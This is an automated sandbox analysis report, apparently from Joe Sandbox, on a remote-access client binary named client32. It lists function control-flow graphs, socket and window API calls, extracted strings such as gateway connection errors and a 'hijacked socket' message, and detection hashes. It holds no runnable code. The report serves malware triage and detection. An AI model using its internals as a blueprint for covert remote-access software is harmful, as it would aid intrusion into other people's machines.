                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                  • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                  • API String ID: 716802716-1571441106
                                                                                  • Opcode ID: 742ea8bdf19e8cca6d5bd37e3cbea73eeb9325f4fe67667d5bccebbacef3dcd8
                                                                                  • Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
                                                                                  • Opcode Fuzzy Hash: 742ea8bdf19e8cca6d5bd37e3cbea73eeb9325f4fe67667d5bccebbacef3dcd8
                                                                                  • Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91
                                                                                  Function 6F9FA980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389networkCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1995 6f9fa980-6f9fa9e7 call 6f9f5840 1998 6f9fa9ed-6f9fa9f0 1995->1998 1999 6f9faa9c 1995->1999 1998->1999 2001 6f9fa9f6-6f9fa9fb 1998->2001 2000 6f9faaa2-6f9faaae 1999->2000 2002 6f9faac6-6f9faacd 2000->2002 2003 6f9faab0-6f9faac5 call 6fa128e1 2000->2003 2001->1999 2004 6f9faa01-6f9faa06 2001->2004 2007 6f9faacf-6f9faad7 2002->2007 2008 6f9fab48-6f9fab58 socket 2002->2008 2004->1999 2006 6f9faa0c-6f9faa21 EnterCriticalSection 2004->2006 2012 6f9faa89-6f9faa9a LeaveCriticalSection 2006->2012 2013 6f9faa23-6f9faa2b 2006->2013 2007->2008 2014 6f9faad9-6f9faadc 2007->2014 2009 6f9fab5a-6f9fab6f WSAGetLastError call 6fa128e1 2008->2009 2010 6f9fab70-6f9fabc9 #21 * 2 call 6f9f5e90 2008->2010 2026 6f9fabcb-6f9fabe3 #21 2010->2026 2027 6f9fabe8-6f9fac1f bind 2010->2027 2012->2000 2017 6f9faa30-6f9faa39 2013->2017 2014->2008 2018 6f9faade-6f9fab05 call 6f9fa5c0 2014->2018 2021 6f9faa3b-6f9faa3f 2017->2021 2022 6f9faa49-6f9faa51 2017->2022 2032 6f9fab0b-6f9fab2f WSAGetLastError call 6f9f30a0 2018->2032 2033 6f9fad4a-6f9fad69 EnterCriticalSection 2018->2033 2021->2022 2028 6f9faa41-6f9faa47 2021->2028 2022->2017 2025 6f9faa53-6f9faa5e LeaveCriticalSection 2022->2025 2025->2000 2026->2027 2029 6f9fac41-6f9fac49 2027->2029 2030 6f9fac21-6f9fac40 WSAGetLastError closesocket call 6fa128e1 2027->2030 2028->2022 2031 6f9faa60-6f9faa88 LeaveCriticalSection call 6fa128e1 2028->2031 2037 6f9fac4b-6f9fac57 2029->2037 2038 6f9fac59-6f9fac64 2029->2038 2045 6f9fae82-6f9fae92 call 6fa128e1 2032->2045 2047 6f9fab35-6f9fab47 call 6fa128e1 2032->2047 2039 6f9fad6f-6f9fad7d 2033->2039 2040 6f9fae50-6f9fae80 LeaveCriticalSection GetTickCount InterlockedExchange 2033->2040 2044 6f9fac65-6f9fac83 htons WSASetBlockingHook call 6f9f7610 2037->2044 2038->2044 2046 6f9fad80-6f9fad86 2039->2046 2040->2045 2054 6f9fac88-6f9fac8d 2044->2054 2050 6f9fad88-6f9fad90 2046->2050 2051 6f9fad97-6f9fae0f InitializeCriticalSection call 6f9f8fb0 call 6fa10ef0 2046->2051 2050->2046 2056 6f9fad92 2050->2056 2069 6f9fae18-6f9fae4b getsockname 2051->2069 2070 6f9fae11 2051->2070 2059 6f9fac8f-6f9facc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 6f9f30a0 call 6fa128e1 2054->2059 2060 6f9facc6-6f9faccd 2054->2060 2056->2040 2063 6f9faccf-6f9facd6 2060->2063 2064 6f9fad45 WSAUnhookBlockingHook 2060->2064 2063->2064 2065 6f9facd8-6f9facfb call 6f9fa5c0 2063->2065 2064->2033 2065->2064 2074 6f9facfd-6f9fad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 6f9f30a0 2065->2074 2069->2040 2070->2069 2074->2045 2077 6f9fad32-6f9fad44 call 6fa128e1 2074->2077
                                                                                  APIs
                                                                                    • Part of subcall function 6F9F5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6F9F8F91,00000000,00000000,6FA3B8DA,?,00000080), ref: 6F9F5852
                                                                                  • EnterCriticalSection.KERNEL32(6FA3B898,?,00000000,00000000), ref: 6F9FAA11
                                                                                  • LeaveCriticalSection.KERNEL32(6FA3B898), ref: 6F9FAA58
                                                                                  • LeaveCriticalSection.KERNEL32(6FA3B898), ref: 6F9FAA68
                                                                                  • LeaveCriticalSection.KERNEL32(6FA3B898), ref: 6F9FAA94
                                                                                  • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6F9FAB0B
                                                                                  • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAB4E
                                                                                  • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAB5A
                                                                                  • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAB8E
                                                                                  • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FABB1
                                                                                  • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FABE3
                                                                                  • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC18
                                                                                  • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC21
                                                                                  • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC29
                                                                                  • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC65
                                                                                  • WSASetBlockingHook.WSOCK32(6F9F63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC76
                                                                                  • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC8F
                                                                                  • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC96
                                                                                  • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC9C
                                                                                  • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FACFD
                                                                                  • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAD04
                                                                                  • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAD0A
                                                                                  • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAD45
                                                                                  • EnterCriticalSection.KERNEL32(6FA3B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAD4F
                                                                                  • InitializeCriticalSection.KERNEL32(-6FA3CB4A), ref: 6F9FADE6
                                                                                    • Part of subcall function 6F9F8FB0: _memset.LIBCMT ref: 6F9F8FE4
                                                                                    • Part of subcall function 6F9F8FB0: getsockname.WSOCK32(?,?,00000010,?,03022F58,?), ref: 6F9F9005
                                                                                  • getsockname.WSOCK32(00000000,?,?), ref: 6F9FAE4B
                                                                                  • LeaveCriticalSection.KERNEL32(6FA3B898), ref: 6F9FAE60
                                                                                  • GetTickCount.KERNEL32 ref: 6F9FAE6C
                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 6F9FAE7A
                                                                                  Strings
                                                                                  • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6F9FAD14
                                                                                  • Connect error to %s using hijacked socket, error %d, xrefs: 6F9FAB17
                                                                                  • Cannot connect to gateway %s, error %d, xrefs: 6F9FACA6
                                                                                  • *TcpNoDelay, xrefs: 6F9FABB8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                  • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                  • API String ID: 692187944-2561115898
                                                                                  • Opcode ID: b2b13355eaa1018d05f8961f4526e08ccf39222af1bbc9baabb3709cd2517d90
                                                                                  • Instruction ID: 310f1a58c7634c34b4856b0c8341217c646bc472b9202bd9e11b0cef6c2051a1
                                                                                  • Opcode Fuzzy Hash: b2b13355eaa1018d05f8961f4526e08ccf39222af1bbc9baabb3709cd2517d90
                                                                                  • Instruction Fuzzy Hash: 9DE19031A052199FDB10DF64DD80BEDB3B9EF49314F1041AAE909D72C0DB34E995CB91
                                                                                  Function 11139ED0 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474windowthreadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2146 11139ed0-11139f05 2147 11139f12-11139f19 2146->2147 2148 11139f07-11139f0d GetCurrentThreadId 2146->2148 2149 11139f20-11139f3c call 11134830 call 11134310 2147->2149 2150 11139f1b call 11029950 2147->2150 2148->2147 2156 11139f42-11139f48 2149->2156 2157 1113a01b-1113a022 2149->2157 2150->2149 2158 1113a59a-1113a5b5 call 11162bb7 2156->2158 2159 11139f4e-11139faf call 11139a70 IsWindow IsWindowVisible call 11147060 call 1105e820 IsWindowVisible 2156->2159 2160 1113a0da-1113a0f0 2157->2160 2161 1113a028-1113a02f 2157->2161 2199 1113a011 2159->2199 2200 11139fb1-11139fb7 2159->2200 2171 1113a0f6-1113a0fd 2160->2171 2172 1113a22f 2160->2172 2161->2160 2164 1113a035-1113a03c 2161->2164 2164->2160 2167 1113a042-1113a051 FindWindowA 2164->2167 2167->2160 2170 1113a057-1113a05c IsWindowVisible 2167->2170 2170->2160 2178 1113a05e-1113a065 2170->2178 2173 1113a0ff-1113a109 2171->2173 2174 1113a10e-1113a12e call 1105e820 2171->2174 2175 1113a231-1113a242 2172->2175 2176 1113a275-1113a280 2172->2176 2173->2176 2174->2176 2196 1113a134-1113a163 2174->2196 2181 1113a244-1113a254 2175->2181 2182 1113a25a-1113a26f 2175->2182 2183 1113a282-1113a2a2 call 1105e820 2176->2183 2184 1113a2b6-1113a2bc 2176->2184 2178->2160 2179 1113a067-1113a08c call 11139a70 IsWindowVisible 2178->2179 2179->2160 2202 1113a08e-1113a09d IsIconic 2179->2202 2181->2182 2182->2176 2205 1113a2b0 2183->2205 2206 1113a2a4-1113a2ae call 1102d750 2183->2206 2190 1113a2be-1113a2ca call 11139a70 2184->2190 2191 1113a2cd-1113a2d5 2184->2191 2190->2191 2194 1113a2e7 2191->2194 2195 1113a2d7-1113a2e2 call 1106c340 2191->2195 2204 1113a2e7 call 1112ddd0 2194->2204 2195->2194 2215 1113a165-1113a179 call 11081d30 2196->2215 2216 1113a17e-1113a191 call 11143e00 2196->2216 2199->2157 2200->2199 2207 11139fb9-11139fd0 call 11147060 GetForegroundWindow 2200->2207 2202->2160 2208 1113a09f-1113a0ba GetForegroundWindow call 11132120 * 2 2202->2208 2210 1113a2ec-1113a2f2 2204->2210 2205->2184 2206->2184 2220 11139fd2-11139ffc EnableWindow call 11132120 * 2 EnableWindow 2207->2220 2221 11139ffe-1113a000 2207->2221 2252 1113a0cb-1113a0d4 EnableWindow 2208->2252 2253 1113a0bc-1113a0c2 2208->2253 2217 1113a2f4-1113a2fa call 11132a10 2210->2217 2218 1113a2fd-1113a306 2210->2218 2215->2216 2242 1113a17b 2215->2242 2243 1113a193-1113a1a4 GetLastError call 11147060 2216->2243 2244 1113a1ae-1113a1b5 2216->2244 2217->2218 2226 1113a314 call 111326b0 2218->2226 2227 1113a308-1113a30b 2218->2227 2220->2221 2221->2199 2230 1113a002-1113a008 2221->2230 2235 1113a319-1113a31f 2226->2235 2227->2235 2236 1113a30d-1113a312 call 11132780 2227->2236 2230->2199 2240 1113a00a-1113a00b SetForegroundWindow 2230->2240 2238 1113a325-1113a32b 2235->2238 2239 1113a429-1113a434 call 11139600 2235->2239 2236->2235 2249 1113a331-1113a339 2238->2249 2250 1113a3db-1113a3e3 2238->2250 2264 1113a436-1113a448 call 110642e0 2239->2264 2265 1113a455-1113a45b 2239->2265 2240->2199 2242->2216 2243->2244 2246 1113a1b7-1113a1d2 2244->2246 2247 1113a228 2244->2247 2262 1113a1d5-1113a1e1 2246->2262 2247->2172 2249->2239 2258 1113a33f-1113a345 2249->2258 2250->2239 2261 1113a3e5-1113a423 call 1103f920 call 1103f960 call 1103f980 call 1103f940 call 11110000 2250->2261 2252->2160 2253->2252 2260 1113a0c4-1113a0c5 SetForegroundWindow 2253->2260 2258->2239 2263 1113a34b-1113a362 call 111101b0 2258->2263 2260->2252 2261->2239 2269 1113a1e3-1113a1f7 call 11081d30 2262->2269 2270 1113a1fc-1113a209 call 11143e00 2262->2270 2283 1113a384 2263->2283 2284 1113a364-1113a382 call 11057eb0 2263->2284 2264->2265 2286 1113a44a-1113a450 call 11142d90 2264->2286 2267 1113a461-1113a468 2265->2267 2268 1113a58a-1113a592 2265->2268 2267->2268 2274 1113a46e-1113a487 call 1105e820 2267->2274 2268->2158 2269->2270 2289 1113a1f9 2269->2289 2270->2247 2291 1113a20b-1113a226 GetLastError call 11147060 2270->2291 2274->2268 2295 1113a48d-1113a4a0 2274->2295 2292 1113a386-1113a3d2 call 1110fff0 call 1104d790 call 1104ecd0 call 1104ed40 call 1104d7d0 2283->2292 2284->2292 2286->2265 2289->2270 2291->2176 2292->2239 2326 1113a3d4-1113a3d9 call 110ec320 2292->2326 2307 1113a4a2-1113a4a8 2295->2307 2308 1113a4cd-1113a4d3 2295->2308 2311 1113a4aa-1113a4c8 call 11147060 GetTickCount 2307->2311 2312 1113a4d9-1113a4e5 GetTickCount 2307->2312 2308->2268 2308->2312 2311->2268 2312->2268 2315 1113a4eb-1113a52b call 11143a50 call 11147af0 call 11143a50 call 110261a0 2312->2315 2332 1113a530-1113a535 2315->2332 2326->2239 2332->2332 2333 1113a537-1113a53d 2332->2333 2334 1113a540-1113a545 2333->2334 2334->2334 2335 1113a547-1113a571 call 1112d6e0 2334->2335 2338 1113a573-1113a574 FreeLibrary 2335->2338 2339 1113a57a-1113a587 call 11162777 2335->2339 2338->2339 2339->2268
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 11139F07
                                                                                  • IsWindow.USER32(0006040E), ref: 11139F65
                                                                                  • IsWindowVisible.USER32(0006040E), ref: 11139F73
                                                                                  • IsWindowVisible.USER32(0006040E), ref: 11139FAB
                                                                                  • GetForegroundWindow.USER32 ref: 11139FC6
                                                                                  • EnableWindow.USER32(0006040E,00000000), ref: 11139FE0
                                                                                  • EnableWindow.USER32(0006040E,00000001), ref: 11139FFC
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 1113A00B
                                                                                  • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 1113A049
                                                                                  • IsWindowVisible.USER32(00000000), ref: 1113A058
                                                                                  • IsWindowVisible.USER32(0006040E), ref: 1113A088
                                                                                  • IsIconic.USER32(0006040E), ref: 1113A095
                                                                                  • GetForegroundWindow.USER32 ref: 1113A09F
                                                                                    • Part of subcall function 11132120: ShowWindow.USER32(0006040E,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                    • Part of subcall function 11132120: ShowWindow.USER32(0006040E,11139EA2,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132156
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 1113A0C5
                                                                                  • EnableWindow.USER32(0006040E,00000001), ref: 1113A0D4
                                                                                  • GetLastError.KERNEL32 ref: 1113A193
                                                                                  • GetLastError.KERNEL32 ref: 1113A20B
                                                                                  • GetTickCount.KERNEL32 ref: 1113A4B8
                                                                                  • GetTickCount.KERNEL32 ref: 1113A4D9
                                                                                    • Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,1113A522), ref: 110261A8
                                                                                  • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                  • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                  • API String ID: 2511061093-2542869446
                                                                                  • Opcode ID: d2c277f1efcbfe15d5673ed47da229280ab303ea4c79ec1b301778a1da1a73c4
                                                                                  • Instruction ID: 9ececd2581658abecd2b9d282a3ee437682ea2591524154b6e9732358788741a
                                                                                  • Opcode Fuzzy Hash: d2c277f1efcbfe15d5673ed47da229280ab303ea4c79ec1b301778a1da1a73c4
                                                                                  • Instruction Fuzzy Hash: FC023675E11226DFE716DFA4DD94BAAFB65BBC131EF140138E4219728CEB30A844CB91
                                                                                  Function 11134830 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278libraryloadertimeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2342 11134830-1113486c 2343 11134872-11134894 call 1105e820 2342->2343 2344 11134b94-11134baf call 11162bb7 2342->2344 2343->2344 2349 1113489a-111348ae GetLocalTime 2343->2349 2350 111348d1-11134953 LoadLibraryA call 11009940 call 110161e0 GetCurrentProcess 2349->2350 2351 111348b0-111348cc call 11147060 2349->2351 2358 11134955-1113496b GetProcAddress 2350->2358 2359 1113496d-11134974 GetProcessHandleCount 2350->2359 2351->2350 2358->2359 2360 11134976-11134978 SetLastError 2358->2360 2361 1113497e-11134986 2359->2361 2360->2361 2362 111349a2-111349ae 2361->2362 2363 11134988-111349a0 GetProcAddress 2361->2363 2366 111349b0-111349c8 GetProcAddress 2362->2366 2368 111349ca-111349d5 2362->2368 2363->2362 2364 111349d7-111349e2 SetLastError 2363->2364 2364->2366 2367 111349e4-111349ec SetLastError 2366->2367 2366->2368 2369 111349ef-111349ff GetProcAddress 2367->2369 2368->2369 2371 11134a01-11134a0d K32GetProcessMemoryInfo 2369->2371 2372 11134a0f-11134a11 SetLastError 2369->2372 2373 11134a17-11134a25 2371->2373 2372->2373 2374 11134a33-11134a3e 2373->2374 2375 11134a27-11134a2f 2373->2375 2376 11134a40-11134a48 2374->2376 2377 11134a4c-11134a57 2374->2377 2375->2374 2376->2377 2378 11134a65-11134a6f 2377->2378 2379 11134a59-11134a61 2377->2379 2380 11134a71-11134a78 2378->2380 2381 11134a7a-11134a7d 2378->2381 2379->2378 2382 11134a7f-11134a8d call 11147060 2380->2382 2381->2382 2383 11134a90-11134aa2 2381->2383 2382->2383 2387 11134b6a-11134b78 2383->2387 2388 11134aa8-11134aba call 110642e0 2383->2388 2389 11134b7a-11134b7b FreeLibrary 2387->2389 2390 11134b7d-11134b85 2387->2390 2388->2387 2396 11134ac0-11134ae1 call 1105e820 2388->2396 2389->2390 2392 11134b87-11134b88 FreeLibrary 2390->2392 2393 11134b8a-11134b8f 2390->2393 2392->2393 2393->2344 2395 11134b91-11134b92 FreeLibrary 2393->2395 2395->2344 2399 11134ae3-11134ae9 2396->2399 2400 11134aef-11134b0b call 1105e820 2396->2400 2399->2400 2401 11134aeb 2399->2401 2404 11134b16-11134b32 call 1105e820 2400->2404 2405 11134b0d-11134b10 2400->2405 2401->2400 2409 11134b34-11134b37 2404->2409 2410 11134b3d-11134b59 call 1105e820 2404->2410 2405->2404 2406 11134b12 2405->2406 2406->2404 2409->2410 2411 11134b39 2409->2411 2414 11134b60-11134b63 2410->2414 2415 11134b5b-11134b5e 2410->2415 2411->2410 2414->2387 2416 11134b65 call 11027de0 2414->2416 2415->2414 2415->2416 2416->2387
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,50D94AA1), ref: 1113489E
                                                                                  • LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
                                                                                  • GetCurrentProcess.KERNEL32 ref: 11134937
                                                                                  • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
                                                                                  • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11134978
                                                                                  • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
                                                                                  • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
                                                                                  • SetLastError.KERNEL32(00000078), ref: 111349D9
                                                                                  • SetLastError.KERNEL32(00000078), ref: 111349E6
                                                                                  • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
                                                                                  • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11134A11
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11134B7B
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11134B88
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11134B92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                  • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                  • API String ID: 263027137-1001504656
                                                                                  • Opcode ID: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                  • Instruction ID: db8711c19b503e7e72fae74a2cc3466c9a493194fb08fa6cc11ddefe45185306
                                                                                  • Opcode Fuzzy Hash: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                  • Instruction Fuzzy Hash: 27B1AE78E402699FDB10CFE9CD80BADFBB5EB88319F104429E419E7648DB749884CB55
                                                                                  Function 6F9F91F0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 97sleepnetworkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • #16.WSOCK32(00000000,009686C7,6FA03361,00000000,00000000,6FA03361,00000007), ref: 6F9F924C
                                                                                  • WSAGetLastError.WSOCK32(00000000,009686C7,6FA03361,00000000,00000000,6FA03361,00000007), ref: 6F9F925B
                                                                                  • GetTickCount.KERNEL32 ref: 6F9F9274
                                                                                  • Sleep.KERNEL32(00000001,00000000,009686C7,6FA03361,00000000,00000000,6FA03361,00000007), ref: 6F9F92A8
                                                                                  • GetTickCount.KERNEL32 ref: 6F9F92B0
                                                                                  • Sleep.KERNEL32(00000014), ref: 6F9F92BC
                                                                                  Strings
                                                                                  • ReadSocket - Connection has been closed by peer, xrefs: 6F9F92E0
                                                                                  • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6F9F922B
                                                                                  • ReadSocket - Error %d reading response, xrefs: 6F9F92F7
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6F9F9226
